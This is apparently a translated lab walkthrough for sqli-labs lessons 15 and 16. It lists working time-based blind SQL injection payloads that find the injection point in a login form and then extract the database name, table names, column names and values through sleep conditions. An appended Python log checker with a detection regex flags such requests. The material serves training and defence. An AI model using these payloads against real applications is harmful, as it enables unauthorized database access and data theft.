  • sqli-labs less-15 --> less-16

    Less-15 (Boolean/time-based blind injection)

    1. Determine whether an injection point exists

    Whether the input is admin, admin' or admin", the page responds normally, so execute uname=admin' and sleep(5)#&passwd=&submit=Submit. The response is delayed, which confirms that an injection point exists. The injection delimiter is: ''

    2. Enumerate the database

    Database name length: uname=admin' and if(length(database())=8,sleep(3),1)#&passwd=&submit=Submit

                         The database name is determined to be 8 characters long

    Database name: uname=admin' and if(substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit

          Tests the first character of the database name

    3. Enumerate tables

    Length of the first table name: uname=admin' and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(3),1)#&passwd=&submit=Submit

    First table name: admin' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(3),1)#

    4. Enumerate columns

    Length of the first column name: admin' and if(length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2,sleep(3),1)#

    First column name: admin' and if(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)='i',sleep(3),1)#

    5. Extract data

    Length of the first value: admin' and if(length((select id from emails limit 0,1))=1,sleep(3),1)#

    First value: admin' and if(substr((select id from emails limit 0,1),1,1)=1,sleep(3),1)#

    -------------------------------------------------------END----------------------------------------------------------------

    Less-16 (Boolean/time-based blind injection)

    1. Determine whether an injection point exists

       Executing uname=admin" and sleep(3)#&passwd=&submit=Submit or uname=admin' and sleep(3)#&passwd=&submit=Submit produces no reaction, so try uname=admin") and sleep(3)#&passwd=&submit=Submit. The page response is delayed, which confirms that an injection point exists.

    2. Enumerate the database

       Database name length: uname=admin") and if (length(database())=8,sleep(3),1)#&passwd=&submit=Submit

          The database name is determined to be 8 characters long

       Database name: uname=admin") and if (substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit

          Tests what the first letter of the database name is

      Continuing in the same way gives the database name 'security'

    3. Enumerate tables

       Length of the first table name: uname=admin") and if (length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(3),1)#&passwd=&submit=Submit

       First table name: uname=admin") and if (substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(3),1)#&passwd=&submit=Submit

    4. Enumerate columns

       Length of the first column name: uname=admin") and if (length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2,sleep(3),1)#&passwd=&submit=Submit

       First column name: uname=admin") and if (substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)='i',sleep(3),1)#&passwd=&submit=Submit

    5. Extract data

       Length of the first value: uname=admin") and if (length((select id from emails limit 0,1))=1,sleep(3),1)#&passwd=&submit=Submit

       First value: uname=admin") and if (substr((select id from emails limit 0,1),1,1)=1,sleep(3),1)#&passwd=&submit=Submit

    -------------------------------------------------------END----------------------------------------------------------------
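
Seen from the defender's side, every request in both lessons has the same shape: a quote (or `")`) closing the string in a login field, a boolean operator, and a `sleep(N)` call. The following is an added example, not part of the original post: a Python check over constructed log entries (the log format, IP addresses and timings are assumptions) that flags that shape in `uname`/`passwd` and uses the response time to separate payloads whose sleep actually ran from probes that did not.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Quote (optionally followed by ")") that closes the string, a boolean
# operator, then a sleep(N) call: the request shape used in Less-15/16.
PATTERN = re.compile(
    r"""['"]\)*\s*(?:and|or)\b.*?\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)""",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample entries: (client IP, response time in seconds, POST body).
SAMPLE_LOG = [
    ("10.0.0.5", 0.04, "uname=admin&passwd=admin&submit=Submit"),
    ("10.0.0.5", 0.05, "uname=o'brien&passwd=x&submit=Submit"),
    ("10.0.0.9", 5.03, "uname=admin' and sleep(5)#&passwd=&submit=Submit"),
    ("10.0.0.9", 0.04, 'uname=admin" and sleep(3)#&passwd=&submit=Submit'),
    ("10.0.0.9", 3.04, "uname=admin%22%29+and+if+%28substr%28database%28%29"
                       "%2C1%2C1%29%3D%27s%27%2Csleep%283%29%2C1%29%23"
                       "&passwd=&submit=Submit"),
]


def classify(elapsed, body):
    """Return 'clean', 'probe' (payload seen, no delay) or 'executed'
    (response took at least as long as the injected sleep)."""
    fields = parse_qs(body, keep_blank_values=True)  # also URL-decodes values
    for value in fields.get("uname", []) + fields.get("passwd", []):
        match = PATTERN.search(value)
        if match:
            return "executed" if elapsed >= float(match.group(1)) else "probe"
    return "clean"


def summarize(log):
    """Count verdicts per client IP."""
    verdicts = {}
    for ip, elapsed, body in log:
        verdicts.setdefault(ip, Counter())[classify(elapsed, body)] += 1
    return verdicts


if __name__ == "__main__":
    for ip, counts in summarize(SAMPLE_LOG).items():
        print(ip, dict(counts))
```

An "executed" verdict means the application concatenated the field into its SQL statement; the fix for that is a parameterized query, and this check only helps triage the logs.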

  • Original article: https://www.cnblogs.com/B-roin/p/12330690.html